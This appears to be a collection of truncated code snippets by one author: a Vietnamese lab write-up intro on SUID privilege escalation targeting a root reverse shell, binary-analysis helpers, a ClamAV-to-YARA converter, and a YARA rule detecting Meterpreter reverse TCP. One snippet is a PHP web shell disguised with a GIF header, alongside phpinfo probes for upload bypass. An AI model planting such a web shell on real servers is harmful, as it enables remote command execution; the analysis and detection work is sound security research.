dmknght

I. Overview

• Ứng ụng có một số file có suid bit với owner root. Vì vậy, attacker có thể lợi dụng lỗ hổng trong các file này để leo thang dặc quyền.
• Goal: Tạo được reverse shell với quyền root

II. Analysis

1. Cách hoạt động của runasroot (công cụ: cutter, ghidra)

Note: cutter (backend là rizin framework) sử dụng bộ framework capstone của anh Anh Quỳnh để phân tích và dịch ngược ra assembly code. Trong khi đó, Ghidra sử dụng bộ từ điển Sleigh riêng. Trong một một số trường hợp, kết quả dịch ngược của cùng 1 binary file khi sử dụng 2 framework này là khác nhau.

runasroot là một file ELF có chứa suid bit và sgid bit

dmknght

import rzpipe # Using rizin framework. Replace with r2pipe for radare2
import json
import hashlib
import os


class BinaryMetadata:
  def __init__(self, path: str):
    self.pipe = rzpipe.open(path)
    self.bin_path = path

dmknght

from qiling import Qiling
from capstone import *
md = Cs(CS_ARCH_X86, CS_MODE_64)


def print_asm(ql, address, size):
# Credits -> https://isc.sans.edu/diary/Qiling+A+true+instrumentable+binary+emulation+framework/27372
    buf = ql.mem.read(address, size)
    for i in md.disasm(buf, address):
        opcode = ' '.join('{:02x}'.format(x) for x in i.bytes)

dmknght

dmknght<?php phpinfo();?>

dmknght

GIF89a <?php system($_GET['c']);?>

dmknght

GIF89a <?php phpinfo();?>

dmknght

GIF89a hehe đang làm exam nè

dmknght

import streams
import bitops
import strutils
import std/enumutils


const
  db_name = "mpavbase.vdm.extracted"

type

dmknght

# Compile: nim c --opt:speed clam_hashes_to_yara.nim
import strutils

const
  clam_db_path = "/home/dmknght/Desktop/performance_comparison/main.hdb"
  yr_converted_rule = "/home/dmknght/Desktop/performance_comparison/clam_hashes.yara"


type
  HashSig = object

dmknght

rule elf64_meterpreter_revtcp_raw {
  meta:
    description = "Detect Meterpreter ELF 64 staged reverse TCP no encoders"
  strings:
    $ = {6a 22 [4] 0f 05 [10] 6a 29 [8] 0f 05}
  condition:
    all of them
}